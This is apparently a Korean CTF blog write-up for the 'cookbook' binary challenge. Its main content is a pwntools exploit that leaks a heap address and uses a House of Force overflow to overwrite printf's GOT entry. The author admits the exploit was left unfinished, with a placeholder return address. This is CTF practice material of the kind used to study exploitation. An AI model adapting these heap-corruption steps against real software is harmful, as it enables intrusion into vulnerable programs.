cookbook.zip( 100% 분석 되어져 있는 idb 파일 있습니당 )
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | #!/usr/bin/python from pwn import * from struct import * conn = remote('localhost',4000) conn.sendline("314ckC47") def HoFTrigger(EIP,topchunk): # Trigger House Of Force # Overwrite 'printf()' target = 0x0804d010 ovaddr = target - 0x8 - topchunk conn.sendline("c") conn.sendline("n") conn.sendline("g") conn.sendline("A"*(896+32)+"\xff\xff\xff\xff") conn.sendline("q") conn.sendline("g") print "[*] Calculated :",hex(ovaddr),pack(">l",ovaddr).encode('hex') conn.sendline(pack(">l",ovaddr).encode('hex')) conn.sendline("");print conn.recvuntil("DIRECTIVE") conn.sendline("g") conn.sendline("100") conn.sendline(EIP) conn.interactive() def HeapLeak(): conn.sendline("c");conn.recvuntil("[q]uit") conn.sendline("n");conn.recvuntil("[q]uit") conn.sendline("a");conn.recvuntil("?") conn.sendline("basil");conn.recvuntil(":") conn.sendline("0");conn.recvuntil("[q]uit") conn.sendline("d");conn.recvuntil("[q]uit") conn.sendline("p");conn.recvuntil("(null)\n") var = int(conn.recvuntil("-")[:-1]) conn.sendline("q");conn.recvuntil("[q]uit") return var Target = HeapLeak() + 4 print "[*] Top Chunk Leaked : "+hex(Target) HoFTrigger("RET!",Target) | cs |
아쉽게도 라이브러리 오프셋 릭 하기 귀찮아서 풀지 않았습니다.
'CTF > Problems' 카테고리의 다른 글
| [문서] Return to syscall + H3X0R CTF libsteak write up (1) | 2018.06.16 |
|---|---|
| 0ctf 2017 babyheap (0) | 2018.01.18 |
| kappa write up (0) | 2016.07.21 |
| mynx writeup (0) | 2016.07.18 |
